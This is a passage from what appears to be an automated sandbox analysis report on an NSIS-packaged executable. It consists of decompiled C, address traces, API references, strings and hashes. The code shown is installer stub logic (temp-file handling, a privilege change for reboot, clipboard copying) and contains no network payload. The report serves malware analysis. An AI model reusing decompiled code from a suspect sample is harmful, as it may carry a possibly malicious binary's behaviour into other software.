						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x00403518
0x00403519
0x00403520
0x00403523
0x0040352a
0x0040352d
0x00403540
0x00403546
0x00403549
0x0040354c
0x0040355a
0x00403562
0x0040356d
0x00403586
0x00403588
0x00403590
0x00403590
0x0040359b
0x0040359d
0x0040359d
0x004035b2
0x004035d7
0x004035e5
0x004035e8
0x004035ef
0x004035f6
0x004035f6
0x004035ef
0x004035f8
0x004035fd
0x004035fe
0x0040360a
0x0040360e
0x00403615
0x00403623
0x00403628
0x0040362f
0x00403633
0x00403637
0x00403639
0x00403639
0x00403637
0x00403640
0x00403647
0x0040364d
0x00403665
0x00403675
0x0040367a
0x00403680
0x00403687
0x0040368e
0x00403690
0x00403691
0x0040369b
0x004036a2
0x004036a4
0x004036a6
0x004036a6
0x004036b9
0x004036bb
0x004037b5
0x004037b5
0x004037b8
0x004037bb
0x00000000
0x00000000
0x004036c5
0x004036c6
0x004036c9
0x004036d2
0x004036d2
0x004036d5
0x004036d8
0x004036db
0x004036de
0x004036de
0x004036de
0x004036df
0x004036e3
0x004037a3
0x004037ac
0x004037ae
0x004037b1
0x004037b4
0x004037b4
0x004037b4
0x00000000
0x004036e9
0x004036ea
0x004036eb
0x004036ef
0x00403709
0x00403710
0x00403723
0x00403724
0x00403739
0x0040373e
0x00403740
0x00403742
0x0040375e
0x00403765
0x00403778
0x00403779
0x0040378e
0x00403794
0x00403796
0x00403798
0x004037a0
0x004037a2
0x00000000
0x004037a2
0x0040379c
0x0040379e
0x004037c3
0x004037c7
0x004037d0
0x004037d5
0x004037db
0x004037e6
0x004037e8
0x004037ed
0x004037ef
0x00403847
0x0040384c
0x00403855
0x0040385c
0x0040385f
0x00403a36
0x00403a36
0x00403a3b
0x00403a44
0x00403a61
0x00403ad9
0x00403ad9
0x00403ae1
0x00403ae3
0x00403ae3
0x00403ae9
0x00403ae9
0x00403a78
0x00403a84
0x00403a95
0x00403a9c
0x00403aa3
0x00403aa3
0x00403aab
0x00403ab7
0x00403ac5
0x00403ad0
0x00000000
0x00000000
0x00000000
0x00403ab9
0x00403ab9
0x00403aba
0x00403abc
0x00403abd
0x00403abe
0x00403ac3
0x00403ad2
0x00403ad4
0x00000000
0x00403ad4
0x00000000
0x00403ac3
0x00403ab7
0x00403a4e
0x00403a55
0x00403a55
0x0040386b
0x00403912
0x00403912
0x0040391e
0x00000000
0x0040391e
0x0040387c
0x00403884
0x004038d6
0x004038d6
0x004038dc
0x004038e3
0x00403931
0x00403933
0x00403938
0x0040393a
0x00403942
0x00403942
0x0040394d
0x00403959
0x0040395f
0x00403961
0x00403a34
0x00403a34
0x00403a34
0x00000000
0x00403967
0x00403967
0x00403969
0x0040396a
0x00403973
0x0040396c
0x0040396c
0x0040396c
0x00403979
0x00403981
0x00403988
0x00403990
0x00403990
0x0040399d
0x004039a9
0x004039b3
0x004039b3
0x004039b5
0x004039bc
0x004039c6
0x004039d2
0x004039d8
0x004039de
0x004039e1
0x004039eb
0x004039f1
0x004039f3
0x004039f7
0x00403a08
0x00403a0e
0x00403a13
0x00403a15
0x00403a18
0x00403a1e
0x00403a1e
0x00403a15
0x004039f3
0x00403a21
0x00403a28
0x00403a28
0x00403a28
0x00403a28
0x00403a2f
0x00000000
0x00403a2f
0x00403961
0x004038e5
0x004038e8
0x004038ec
0x004038f1
0x004038f3
0x00000000
0x00000000
0x004038ff
0x0040390a
0x0040390f
0x00000000
0x0040390f
0x0040388d
0x004038a5
0x004038b6
0x004038b7
0x004038bb
0x004038bd
0x004038cb
0x004038d2
0x00000000
0x00000000
0x00000000
0x004038d2
0x004038d4
0x00000000
0x004038d4
0x004037f7
0x00403803
0x00403808
0x0040380d
0x0040380f
0x00000000
0x00000000
0x00403817
0x0040381f
0x00403830
0x00403838
0x0040383a
0x0040383f
0x00403841
0x00000000
0x00000000
0x00000000
0x00403841
0x00000000
0x0040379e
0x00403747
0x00403749
0x00000000
0x00000000
0x0040374b
0x0040374f
0x00403753
0x0040375a
0x0040375a
0x0040375a
0x0040375a
0x00000000
0x0040375a
0x00403755
0x00403758
0x00000000
0x00000000
0x00000000
0x00403758
0x004036f1
0x004036f5
0x004036f8
0x004036ff
0x004036ff
0x00000000
0x004036ff
0x004036fa
0x004036fd
0x00000000
0x00000000
0x00000000
0x004036fd
0x00000000
0x00000000
0x00000000
0x004036cb
0x004036cb
0x004036cc
0x004036cd
0x004036cd
0x00000000
0x004036cb
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 0040352D
GetVersionExW.KERNEL32(?), ref: 00403556
GetVersionExW.KERNEL32(0000011C), ref: 0040356D
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
OleInitialize.OLE32(00000000), ref: 00403647
SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
CharNextW.USER32(00000000,"C:\Users\user\Desktop\aSsc9zh1ex.exe" ,00000020,"C:\Users\user\Desktop\aSsc9zh1ex.exe" ,00000000), ref: 004036B3
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037E6
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037F7
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403803
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403817
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381F
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403830
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403838
DeleteFileW.KERNELBASE(1033), ref: 0040384C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403933
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403942

Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040394D
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\aSsc9zh1ex.exe" ,00000000,?), ref: 00403959
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403979
DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
CopyFileW.KERNEL32(C:\Users\user\Desktop\aSsc9zh1ex.exe,0079F708,00000001), ref: 004039EB
CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000), ref: 00403A18
OleUninitialize.OLE32(?), ref: 00403A3B
ExitProcess.KERNEL32 ref: 00403A55
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AC8
ExitProcess.KERNEL32 ref: 00403AE9

Strings

Low, xrefs: 00403819
SeShutdownPrivilege, xrefs: 00403A7E
~nsu, xrefs: 0040392B
1033, xrefs: 00403847
TEMP, xrefs: 0040382B
"C:\Users\user\Desktop\aSsc9zh1ex.exe" , xrefs: 00403680, 00403686, 0040369B, 00403872, 0040387E, 004038CC, 004038D6
Error launching installer, xrefs: 004038DC
C:\Users\user\AppData\Local\Temp\, xrefs: 004037DB, 004037E0, 004037F6, 00403802, 00403811, 0040381E, 0040382A, 00403832, 00403930, 00403941, 0040394C, 00403958, 00403969, 00403978, 00403A2E
\Temp, xrefs: 004037FD
NSIS Error, xrefs: 0040366B
C:\Users\user\Desktop\aSsc9zh1ex.exe, xrefs: 004039E6
UXTHEME, xrefs: 004035F8, 004035FD, 00403603
TMP, xrefs: 00403833
.tmp, xrefs: 00403947
C:\Users\user\AppData\Local\Temp, xrefs: 004037CB, 004038FA, 00403981, 0040398B

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\aSsc9zh1ex.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\aSsc9zh1ex.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-2423151299
Opcode ID: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
Instruction ID: 53a60b58fdbd25313d51bce5ca3a2b86b24fade18f433b590921527e5da6acff
Opcode Fuzzy Hash: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
Instruction Fuzzy Hash: B2E1F8B0A00214ABD720AFB59D45ABF3AB8EB45705F10807EF581B62D1DB7C8B41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056BB Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004056BB(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a44;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040564F, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						FindCloseChangeNotification(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406557(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f48;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a7a2c == _t156) {
							ShowWindow( *0x7a8a68, 8);
							if( *0x7a8aec == _t156) {
								_t119 =  *0x7a0f20; // 0xa1e104
								E0040557C( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040444F(_t171);
							goto L25;
						}
						 *0x7a0718 = 2;
						E0040444F(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044DD(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a30, _t156);
						ShowWindow(_t169, 8);
						E004044AB(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8a70;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a30 = GetDlgItem(_a4, 0x403);
				 *0x7a7a28 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a44 = _t134;
				_v8 = _t134;
				E004044AB( *0x7a7a30);
				 *0x7a7a34 = E00404E04(4);
				 *0x7a7a4c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404476(_a4);
				if(( *0x7a8a78 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a30, _t156);
					if(( *0x7a8a78 & 0x00000002) != 0) {
						 *0x7a7a30 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044AB( *0x7a7a28);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8a78 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056c3
0x004056c9
0x004056d3
0x004056d6
0x0040586c
0x00405889
0x00405890
0x00405890
0x004058a3
0x004058c1
0x004058c3
0x004058cb
0x00405921
0x00405925
0x00000000
0x00000000
0x00405927
0x0040592d
0x00000000
0x00000000
0x00405937
0x0040593f
0x00405942
0x00405a44
0x00000000
0x00405a44
0x00405951
0x0040595c
0x00405965
0x00405970
0x00405973
0x0040597c
0x00405982
0x00405985
0x00405985
0x0040599d
0x004059a6
0x004059a9
0x004059b0
0x004059b7
0x004059bf
0x004059bf
0x004059d6
0x004059d6
0x004059dd
0x004059e3
0x004059ef
0x004059f6
0x004059ff
0x00405a01
0x00405a04
0x00405a13
0x00405a16
0x00405a1c
0x00405a1d
0x00405a23
0x00405a24
0x00405a25
0x00405a2d
0x00405a38
0x00405a3e
0x00405a3e
0x00000000
0x0040599d
0x004058d3
0x00405903
0x0040590b
0x0040590d
0x00405916
0x00405916
0x0040591c
0x00000000
0x0040591c
0x004058d7
0x004058e1
0x00000000
0x004058a5
0x004058ab
0x004058e6
0x00000000
0x004058ef
0x004058b4
0x004058b9
0x004058bc
0x00000000
0x004058bc
0x004058a3
0x004056dc
0x004056e0
0x004056e8
0x004056ec
0x004056ef
0x004056f2
0x004056f5
0x004056f8
0x004056f9
0x004056fa
0x00405713
0x00405716
0x00405720
0x0040572f
0x00405737
0x0040573f
0x00405744
0x00405747
0x00405753
0x0040575c
0x00405765
0x00405787
0x0040578d
0x0040579e
0x004057a3
0x004057b1
0x004057bf
0x004057bf
0x004057c4
0x004057d2
0x004057d2
0x004057d7
0x004057da
0x004057df
0x004057eb
0x004057f4
0x00405801
0x00405810
0x00405803
0x00405808
0x00405808
0x0040581c
0x0040581c
0x00405830
0x00405839
0x00405842
0x00405852
0x0040585e
0x0040585e
0x00000000

APIs

GetDlgItem.USER32 ref: 00405719
GetDlgItem.USER32 ref: 00405728
GetClientRect.USER32 ref: 00405765
GetSystemMetrics.USER32 ref: 0040576C
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040578D
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040579E
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057B1
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057BF
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057D2
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057F4
ShowWindow.USER32(?,00000008), ref: 00405808
GetDlgItem.USER32 ref: 00405829
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405839
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405852
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040585E
GetDlgItem.USER32 ref: 00405737

Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9

GetDlgItem.USER32 ref: 0040587B
CreateThread.KERNELBASE ref: 00405889
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405890
ShowWindow.USER32(00000000), ref: 004058B4
ShowWindow.USER32(?,00000008), ref: 004058B9
ShowWindow.USER32(00000008), ref: 00405903
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405937
CreatePopupMenu.USER32 ref: 00405948
AppendMenuW.USER32 ref: 0040595C
GetWindowRect.USER32 ref: 0040597C
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405995
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059CD
OpenClipboard.USER32(00000000), ref: 004059DD
EmptyClipboard.USER32 ref: 004059E3
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059EF
GlobalLock.KERNEL32 ref: 004059F9
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0D
GlobalUnlock.KERNEL32(00000000), ref: 00405A2D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A38
CloseClipboard.USER32 ref: 00405A3E

Strings

{, xrefs: 00405921

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
Instruction ID: d7cac64708ae36737aaf404740c8a4e4a0ccfdbfd79e04772bb75515dd65aeb5
Opcode Fuzzy Hash: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
Instruction Fuzzy Hash: BFB14BB1900608FFDF11AF64DD89AAE7B79FB48354F00802AFA41B61A0CB795A51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 732D1BFF Relevance: 25.1, APIs: 13, Strings: 1, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E732D1BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E732D12BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E732D12BB();
				_t321 = E732D12E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t332 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E732D13B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E732D162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
